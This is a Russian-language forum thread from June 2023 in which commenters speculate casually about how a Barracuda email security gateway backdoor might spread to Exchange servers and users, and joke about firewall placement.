А встроить в такой конфиг заразу - дело техники...
| | |
| |
| 6.132, _ (??), 22:50, 13/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
Я Barracuda последний раз видел в 2015-6 году, на пямять - еЯ конфиг просто богомерзкий XML ... Не надо фантазий там где не надо.
| | |
|
|
| 4.133, _ (??), 22:52, 13/06/2023 [^] [^^] [^^^] [ответить]
| +/– | |
>ты вообще не понял масштаб кабздеца.
ORLY?! ;-)
>Заражается ESG через бэкдор, подгружаются левые демоны SMTP, от EGS заражается почтовый сервак, который ESG по-идее защищает, и понеслось заражение через email всех кто в базе почтовика.
Вот в этом месте - подробнее, с тех. деталями. Раскрой механизм дейста, ЫнжеНегище! :)
PS: Как думаете - сольётся?
| | |
| |
| 5.134, Tron is Whistling (?), 23:29, 13/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
Да фиг ли там раскрывать.
Заражается ESG, сканит сеть, ломает протухшую винду с сексченджем, начинает юзерам письма счастья рассылать (я ваш енженегр, загрузите вот этот файлик срочно иначе документы будут потеряны).
Другое дело что на практике так случается не часто :D
| | |
| |
| 6.135, _ (??), 17:27, 14/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
:)
Там два порта обычно открыто до инлета Ыксчейдного - почта и директорий.
PS: О! Погодь!
Это ты к тому что у тебя баракуда и Ыксчейндж НЕ по разные стороны фаервола?!? 8-о
И так бывает? А ... Понял ... УХ! ... 8-)
| | |
| |
| 7.136, Tron is Whistling (?), 19:59, 14/06/2023 [^] [^^] [^^^] [ответить]
| +/– |
У половины рогов и копыт именно так и бывает :D
Одна сторона в паблике, другая в локалке.
У меня вообще немножко по-другому, но да, случай типовой.
| | |
|
|
|
|
|
|
|
